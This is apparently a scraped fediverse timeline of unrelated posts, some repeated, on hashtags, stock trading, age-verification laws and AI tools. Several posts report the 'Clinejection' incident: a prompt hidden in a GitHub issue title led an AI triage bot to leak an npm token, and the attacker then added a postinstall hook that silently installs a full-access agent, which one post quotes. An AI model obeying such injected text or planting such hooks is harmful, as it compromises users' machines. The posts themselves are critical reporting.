What is Hackers' Pub?

Hackers' Pub is a place for software engineers to share their knowledge and experience with each other. It's also an ActivityPub-enabled social network, so you can follow your favorite hackers in the fediverse and get their latest posts in your feed.

0

Hi @FediTips 👋

I was wondering, how about writing a tip about putting all the hashtags (or at least most of them) at the very end of a post?

When hashtags are at the end of the post then the web interface (and maybe apps? not sure…) will only show the first couple of tags and then add a "more" link for the rest.

Even without that feature putting all the hashtags at the end makes the post less cluttered and easier to read.

Thanks for considering this!

0
0

그럼 이럴때 인버스를 사면 되지 않냐는 질문이 있을 수 있겠지만 결론적으로는 좋지 않습니다. 공포심리로 인해 시초가가 저점일 가능성이 크기 때문입니다. 물론 시초가 이후 안정 과정에서 한 차례 언더슛이 생겨 주워먹을 자리가 나올 수도 있지만 얻을 수 있는 리턴 대비 리스크가 너무 커요. 그래서 이럴때는 최대한 프리장에서 엑싯을 하거나, 시초가를 잘 보고 방어적으로 평단을 낮춰야 합니다.

0
0
0
0
0
0

Some one said they wanted boobs.

And I was like, "don't we all!?"

Not in the same context, or for the same goals but, yeah. This is why I always say: less drama, more boobs

Just imagine a world where this was possible. Without the prudes getting offended, or the incels getting violent.

So anyway, I hope everyone gets, with the proper consent, the boobs they want or desire.

0
1

그래서 다른 채널에서 어제 예측했던것처럼 상당량의 갭하 물량이 나오고, 진폭이 큰 Whip-Saw 패턴이 나올 가능성이 큽니다. 하락은 있지만 하락만 있는게 아니라 진폭이 매우 클 것으로 판단됩니다. 예측되는 패턴은 갭하 출발, 장중 반등, 재하락입니다. 전체적으로 국장 큰 하락이 예측되니 특히 투자하시는 분들은 아침에 멘탈 잘 부여잡으셔야 합니다. 프리장 가격을 보고 1. 공포가 형성되지 않은 채 2. 스프레드가 좁고 3. 매수호가가 쌓여있으면 바로 좋은 가격에 남은 물량 소량을 전액 현금화, 본장을 대비합니다.

0
1
0
0

The way I expect this to go down is that Android/iOS/etc. will roll out an age bracket API call in the near future and tie that API call to some set of foundational permissions (e.g. internet access / file access / etc) - they have done this in the past, notably for API deprecation.

A minimally invasive implementation of this will likely only restrict apps running if the OS itself is being run in a kids-mode .

(But that isn't what the laws actually require)

It's a very, very short jump from "the law requires you to call this API to know a users age" to "the law requires you to call this API to backdoor the rng"

The precedent of the former makes me very uneasy.

I cannot in good conscious support software on any platform subject to a jurisdiction that mandates such calls.

(I also think making the existence of parental controls settings on an OS as mandatory is also a little iffy, but in a less catastrophic way)

0

RE: mastodon.social/@sarahjamielew

Something I want to make clear:

The "age verification" bit of the CA/CO laws are not the bit I care about i.e. a law that requires an operating systems to implement some kind of parental control feature is...whatever.

The bits I care about are the obligations on developers to call APIs and then that invocation being taken as evidence of knowledge.

Specifically, I think a -legal- requirement to:

- make any kind of call is an attack on speech
- know a users age (bracket) is a privacy violation

The way I expect this to go down is that Android/iOS/etc. will roll out an age bracket API call in the near future and tie that API call to some set of foundational permissions (e.g. internet access / file access / etc) - they have done this in the past, notably for API deprecation.

A minimally invasive implementation of this will likely only restrict apps running if the OS itself is being run in a kids-mode .

(But that isn't what the laws actually require)

0

RE: mastodon.social/@sarahjamielew

Something I want to make clear:

The "age verification" bit of the CA/CO laws are not the bit I care about i.e. a law that requires an operating systems to implement some kind of parental control feature is...whatever.

The bits I care about are the obligations on developers to call APIs and then that invocation being taken as evidence of knowledge.

Specifically, I think a -legal- requirement to:

- make any kind of call is an attack on speech
- know a users age (bracket) is a privacy violation

0

Tom Casavant shared the below article:

8.0.0 — Smash That Like Button

ActivityPub for WordPress @activitypub.blog@activitypub.blog

WordPress ActivityPub 8.0.0 makes your blog more interactive in the Fediverse: visitors can Like/Boost posts directly on-site, with faster repeat interactions and clearer guidance. New Fediverse block patterns/templates speed setup, a pre-publish panel suggests post formats, community snippets land in-repo, and remote media caching is rebuilt for reliability. PHP 7.4+ required.

Read more →
0
0
0

Almost 25,000 people have now watched my video on building apps with AI – tips for using Claude, Codex, and more to get great results. I've been overwhelmed with your feedback, and I really appreciate hearing how folks at all levels learned new things 🙇‍♂️ youtube.com/live/sc6pvW6vQzA

0

The March 3rd, 2026 Jail/Zones Production User Call:

youtu.be/3yHGSoaWIZ0

We discussed the new Jail feature, new VLAN support in the software bridge, sudo alternatives, a Sylve Jail deep-dive, and more!

"Don't forget to slam those Like and Subscribe buttons."

You can support all Call For Testing efforts via BSD Fund: bsdfund.org

0
0
0
0

@dandylyonsDaniel Lyons @cwebberChristine Lemmer-Webber it is about an attack based on covertly deploying LLM development tools, with the possible intent of later using them to leverage a second stage attack. If the LLM development tools were already installed, installing openclaw would not have been necessary and the attack could have worked a different way. We are discussing a situation where *the developer of a piece of software I use merely having LLM tools on their computer represents a risk to me*

0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0

I am convinced we are on the verge of the first "AI agent worm". This looks like the closest hint of it, though it isn't it quite itself: an attack on a PR agent that got it to set up to install openclaw with full access on 4k machines grith.ai/blog/clinejection-whe

But, the agents installed weren't given instructions to *do* anything yet.

Soon they will be. And when they are, the havoc will be massive. Unlike traditional worms, where you're looking for the typically byte-for-byte identical worm embedded in the system, an agent worm can do different, nondeterministic things on every install, and carry out a global action.

I suspect we're months away from seeing the first agent worm, *if* that. There may already be some happening right now in FOSS projects, undetected.

0
0

I am convinced we are on the verge of the first "AI agent worm". This looks like the closest hint of it, though it isn't it quite itself: an attack on a PR agent that got it to set up to install openclaw with full access on 4k machines grith.ai/blog/clinejection-whe

But, the agents installed weren't given instructions to *do* anything yet.

Soon they will be. And when they are, the havoc will be massive. Unlike traditional worms, where you're looking for the typically byte-for-byte identical worm embedded in the system, an agent worm can do different, nondeterministic things on every install, and carry out a global action.

I suspect we're months away from seeing the first agent worm, *if* that. There may already be some happening right now in FOSS projects, undetected.

0
10
0

Just absolutely no regard for security at all. None. The entire burden of self-protection shifted to humans alone at their endpoints in systems and communities entirely, foundationally built on mutual trust and trustworthiness.

On February 17, 2026, someone published cline@2.3.0 to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json:

"postinstall": "npm install -g openclaw@latest"

For the next eight hours, every developer who installed or updated Cline got OpenClaw - a separate AI agent with full system access - installed globally on their machine without consent. Approximately 4,000 downloads occurred before the package was pulled1.

The interesting part is not the payload. It is how the attacker got the npm token in the first place: by injecting a prompt into a GitHub issue title, which an AI triage bot read, interpreted as an instruction, and executed.
0
10
0

By typical use (at least after 3/11)…

iPhone Air: Everyday, always with me computer

iPad Pro 11”: Meeting computer

MacBook Neo: Fun computer

Sadly my “pro” work is mostly meetings, though occasionally a MBA will make an appearance when Keynote is required. I’m excited to use the Neo for fun, creative things: writing, personal code, deep thinking

0
0
0
1
0
0
0
0